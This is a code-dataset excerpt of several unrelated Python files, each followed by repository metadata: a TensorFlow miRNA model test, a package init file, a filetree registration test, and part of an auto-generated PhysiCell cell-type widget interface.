true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
true_utr_coef = 0.1
occ = sigmoid(features + true_freeAgo)
nbound = true_decay * np.sum(occ * mask, axis=2)
nbound_endog = true_utr_coef * utr_lengths
pred_endog = np.log1p(nbound_endog)
pred_transfect = np.log1p(nbound_endog + nbound)
labels = -1 * (pred_transfect - pred_endog)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='mask')
utrlen_tensor = tf.placeholder(tf.float32, shape=[None, 1], name='utr_len')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'ka_vals': features_tensor,
'mask': mask_tensor,
'utr_len': utrlen_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
utrlen_tensor: utr_lengths,
labels_tensor: labels
}
model = models.OriginalModel(num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(np.exp(model.vars_evals['log_decay']) - true_decay)))
print('True utr_coef diff: {}'.format(np.abs(np.exp(model.vars_evals['log_utr_coef']) - true_utr_coef)))
print('Label r2: {}'.format(model.r2))
def test_originallet7_model(num_genes, num_mirs, num_max_sites, maxiter):
# generate random data
np.random.seed(0)
utr_lengths = (np.random.randint(5000, size=num_genes) / 2000).reshape([-1, 1])
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites] = np.random.rand(nsites)
mask = (features != 0).astype(int)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_freeAgolet7 = true_freeAgo[0,-1,0] - 1
true_decay = 1.5
true_utr_coef = 0.1
occ = sigmoid(features + true_freeAgo)
nbound = true_decay * np.sum(occ * mask, axis=2)
nbound_endog = true_utr_coef * utr_lengths
pred_endog = np.log1p(nbound_endog)
pred_transfect = np.log1p(nbound_endog + nbound)
labels = -1 * (pred_transfect - pred_endog)
occ_let7 = sigmoid(features[:, -1, :] + true_freeAgolet7)
nbound_let7 = true_decay * np.sum(occ_let7 * mask[:, -1, :], axis=1)
labels2 = -1 * (np.log1p(nbound_let7 + nbound_endog[:, -1]) - pred_endog[:, -1])
print(labels[:, -1].shape)
labels[:, -1] -= labels2
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='mask')
utrlen_tensor = tf.placeholder(tf.float32, shape=[None, 1], name='utr_len')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'ka_vals': features_tensor,
'mask': mask_tensor,
'utr_len': utrlen_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
utrlen_tensor: utr_lengths,
labels_tensor: labels
}
model = models.OriginalModelLet7(num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True freeAgo_let7 diff: {}'.format(np.abs(model.vars_evals['freeAgo_init_let7'] - true_freeAgolet7)))
print('True decay diff: {}'.format(np.abs(np.exp(model.vars_evals['log_decay']) - true_decay)))
print('True utr_coef diff: {}'.format(np.abs(np.exp(model.vars_evals['log_utr_coef']) - true_utr_coef)))
print('Label r2: {}'.format(model.r2))
# test_linear_model(5000,17,50,24,200)
# test_linear_model(100,17,10,10,200)
# test_boundedlinear_model(100,17,10,10,200)
# test_sigmoid_model(100, 5, 12, 5, 5, 2000)
# test_sigmoid_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoid_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoid_model(5000, 5, 50, 5, 5, 2000)
# test_sigmoidfreeago_model(100, 5, 12, 5, 5, 2000)
# test_sigmoidfreeago_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoidfreeago_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoidfreeago_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoidfreeagolet7_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoidfreeagolet7_model(5000, 5, 50, 5, 5, 2000)
# test_original_model(100, 5, 12, 2000)
test_originallet7_model(100, 5, 12, 2000)
| 38.489633 | 133 | 0.664526 | 3,373 | 24,133 | 4.541358 | 0.051586 | 0.006398 | 0.016908 | 0.039757 | 0.923815 | 0.917222 | 0.903251 | 0.896919 | 0.877073 | 0.86715 | 0 | 0.032485 | 0.191273 | 24,133 | 626 | 134 | 38.551118 | 0.75237 | 0.056644 | 0 | 0.814286 | 0 | 0 | 0.066429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02619 | false | 0 | 0.011905 | 0.004762 | 0.042857 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa5b13390157d4dd81e54658fbc7f4b8b90d62f8 | 76 | py | Python | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 251 | 2021-02-16T10:11:35.000Z | 2022-03-21T11:25:14.000Z | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 16 | 2021-04-12T15:03:52.000Z | 2022-03-07T20:54:40.000Z | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 13 | 2021-02-17T05:36:38.000Z | 2022-02-02T16:27:35.000Z | from .lib import * # noqa: F401,F403
from .gen import * # noqa: F401,F403
| 25.333333 | 37 | 0.657895 | 12 | 76 | 4.166667 | 0.583333 | 0.4 | 0.56 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0.210526 | 76 | 2 | 38 | 38 | 0.633333 | 0.407895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aa7171ee81d30accb2f55068a387a214557a8965 | 2,403 | py | Python | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 6 | 2018-04-18T03:42:50.000Z | 2021-11-20T18:46:37.000Z | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 13 | 2018-10-01T11:45:05.000Z | 2022-03-16T12:28:36.000Z | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 5 | 2017-12-09T09:02:17.000Z | 2021-11-15T16:55:30.000Z | from fsl.utils.filetree import register_tree, FileTree
import os.path as op
class SubFileTree(FileTree):
pass
def test_register_parent():
directory = op.split(__file__)[0]
filename = op.join(directory, 'parent.tree')
# call from sub-type
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# call from FileTree
tree = FileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# register + call from FileTree
register_tree('parent', SubFileTree)
tree = FileTree.read(filename)
assert isinstance(tree, FileTree)
assert isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# register + call from SubFileTree
register_tree('parent', FileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
def test_children():
directory = op.split(__file__)[0]
filename = op.join(directory, 'parent.tree')
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
register_tree('eddy', SubFileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert isinstance(child, SubFileTree)
register_tree('eddy', FileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
| 32.472973 | 54 | 0.706201 | 277 | 2,403 | 6.043321 | 0.133574 | 0.162485 | 0.111708 | 0.177419 | 0.860215 | 0.860215 | 0.830346 | 0.830346 | 0.830346 | 0.807049 | 0 | 0.001046 | 0.204328 | 2,403 | 73 | 55 | 32.917808 | 0.874477 | 0.041615 | 0 | 0.803571 | 0 | 0 | 0.018277 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.035714 | false | 0.017857 | 0.035714 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
aaadd5b68a6a62e67a7baad86238c9db72ae25a7 | 129,071 | py | Python | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null |
# This file is auto-generated from a Python script that parses a PhysiCell configuration (.xml) file.
#
# Edit at your own risk.
#
import os
from ipywidgets import Label,Text,Checkbox,Button,HBox,VBox,FloatText,IntText,BoundedIntText,BoundedFloatText,Layout,Box,Dropdown
class CellTypesTab(object):
def __init__(self):
micron_units = Label('micron') # use "option m" (Mac, for micro symbol)
constWidth = '180px'
tab_height = '500px'
stepsize = 10
#style = {'description_width': '250px'}
style = {'description_width': '25%'}
layout = {'width': '400px'}
name_button_layout={'width':'25%'}
widget_layout = {'width': '15%'}
widget_layout_long = {'width': '20%'}
units_button_layout ={'width':'15%'}
desc_button_layout={'width':'45%'}
divider_button_layout={'width':'40%'}
divider_button_layout={'width':'60%'}
box_layout = Layout(display='flex', flex_flow='row', align_items='stretch', width='100%')
self.cell_type_dropdown = Dropdown(description='Cell type:',)
self.cell_type_dropdown.style = {'description_width': '%sch' % str(len(self.cell_type_dropdown.description) + 1)}
cell_type_names_layout={'width':'30%'}
cell_type_names_style={'description_width':'initial'}
self.parent_name = Text(value='None',description='inherits properties from parent type:',disabled=True, style=cell_type_names_style, layout=cell_type_names_layout)
explain_inheritance = Label(value=' This cell line inherits its properties from its parent type. Any settings below override those inherited properties.') # , style=cell_type_names_style, layout=cell_type_names_layout)
self.cell_type_parent_row = HBox([self.cell_type_dropdown, self.parent_name])
self.cell_type_parent_dict = {}
self.cell_type_dict = {}
self.cell_type_dict['default'] = 'default'
self.cell_type_dict['lung epithelium'] = 'lung epithelium'
self.cell_type_dict['immune'] = 'immune'
self.cell_type_dict['CD8 Tcell'] = 'CD8 Tcell'
self.cell_type_dict['macrophage'] = 'macrophage'
self.cell_type_dict['neutrophil'] = 'neutrophil'
self.cell_type_dropdown.options = self.cell_type_dict
self.cell_type_dropdown.observe(self.cell_type_cb)
self.cell_type_parent_dict['default'] = 'None'
self.cell_type_parent_dict['lung epithelium'] = 'default'
self.cell_type_parent_dict['immune'] = 'default'
self.cell_type_parent_dict['CD8 Tcell'] = 'immune'
self.cell_type_parent_dict['macrophage'] = 'immune'
self.cell_type_parent_dict['neutrophil'] = 'immune'
self.cell_def_vboxes = []
self.bnd_filenames = [None]*6
self.cfg_filenames = [None]*6
# >>>>>>>>>>>>>>>>> <cell_definition> = default
# -------------------------
div_row1 = Button(description='phenotype:cycle (model: flow_cytometry_separated_cycle_model; code=6)', disabled=True, layout=divider_button_layout)
div_row1.style.button_color = 'orange'
name_btn = Button(description='Phase 0 -> Phase 1 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float0 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float0, units_btn, ]
box0 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 1 -> Phase 2 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float1 = FloatText(value='0.00208333', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float1, units_btn, ]
box1 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 2 -> Phase 3 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float2 = FloatText(value='0.00416667', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float2, units_btn, ]
box2 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 3 -> Phase 0 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float3 = FloatText(value='0.0166667', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float3, units_btn, ]
box3 = Box(children=row, layout=box_layout)
# -------------------------
div_row2 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row2.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float4 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float4, units_btn, ]
box4 = Box(children=row, layout=box_layout)
name_btn = Button(description='unlysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float5 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float5, units_btn, ]
box5 = Box(children=row, layout=box_layout)
name_btn = Button(description='lysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float6 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float6, units_btn, ]
box6 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float7 = FloatText(value='1.66667e-02', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float7, units_btn, ]
box7 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float8 = FloatText(value='5.83333e-03', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float8, units_btn, ]
box8 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float9 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float9, units_btn, ]
box9 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float10 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float10, units_btn, ]
box10 = Box(children=row, layout=box_layout)
death_model2 = Button(description='model: necrosis', disabled=True, layout={'width':'30%'})
death_model2.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float11 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float11, units_btn, ]
box11 = Box(children=row, layout=box_layout)
name_btn = Button(description='unlysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float12 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float12, units_btn, ]
box12 = Box(children=row, layout=box_layout)
name_btn = Button(description='lysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float13 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float13, units_btn, ]
box13 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float14 = FloatText(value='1.66667e-02', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float14, units_btn, ]
box14 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float15 = FloatText(value='5.83333e-03', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float15, units_btn, ]
box15 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float16 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float16, units_btn, ]
box16 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float17 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float17, units_btn, ]
box17 = Box(children=row, layout=box_layout)
# -------------------------
div_row3 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row3.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float18 = FloatText(value='2494', step='100', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float18, units_btn, ]
box18 = Box(children=row, layout=box_layout)
name_btn = Button(description='fluid_fraction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float19 = FloatText(value='0.75', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float19, units_btn, ]
box19 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float20 = FloatText(value='540', step='10', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float20, units_btn, ]
box20 = Box(children=row, layout=box_layout)
name_btn = Button(description='fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float21 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float21, units_btn, ]
box21 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float22 = FloatText(value='0.0045', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float22, units_btn, ]
box22 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float23 = FloatText(value='0.0055', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float23, units_btn, ]
box23 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcified_fraction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float24 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float24, units_btn, ]
box24 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float25 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float25, units_btn, ]
box25 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float26 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float26, units_btn, ]
box26 = Box(children=row, layout=box_layout)
# -------------------------
div_row4 = Button(description='phenotype:mechanics', disabled=True, layout=divider_button_layout)
div_row4.style.button_color = 'orange'
name_btn = Button(description='cell_cell_adhesion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float27 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float27, units_btn, ]
box27 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_cell_repulsion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float28 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float28, units_btn, ]
box28 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_maximum_adhesion_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float29 = FloatText(value='1.25', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float29, units_btn, ]
box29 = Box(children=row, layout=box_layout)
self.bool0 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='set_relative_equilibrium_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float30 = FloatText(value='1.8', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [self.bool0, name_btn, self.float30, units_btn, ]
box30 = Box(children=row, layout=box_layout)
self.bool1 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='set_absolute_equilibrium_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float31 = FloatText(value='15.12', step='1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [self.bool1, name_btn, self.float31, units_btn, ]
box31 = Box(children=row, layout=box_layout)
# -------------------------
div_row5 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row5.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float32 = FloatText(value='4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float32, units_btn]
box32 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float33 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float33, units_btn]
box33 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float34 = FloatText(value='0.7', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float34, units_btn]
box34 = Box(children=row, layout=box_layout)
self.bool2 = Checkbox(description='enabled', value=False,layout=name_button_layout)
self.bool3 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool4 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate1 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate1]
box35 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction1 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction1]
box36 = Box(children=row, layout=box_layout)
# -------------------------
div_row6 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row6.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text0 = Text(value='interferon 1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text0]
box37 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float35 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float35, units_btn]
box38 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text1 = Text(value='pro-inflammatory cytokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text1]
box39 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float36 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float36, units_btn]
box40 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text2 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text2]
box41 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float37 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float37, units_btn]
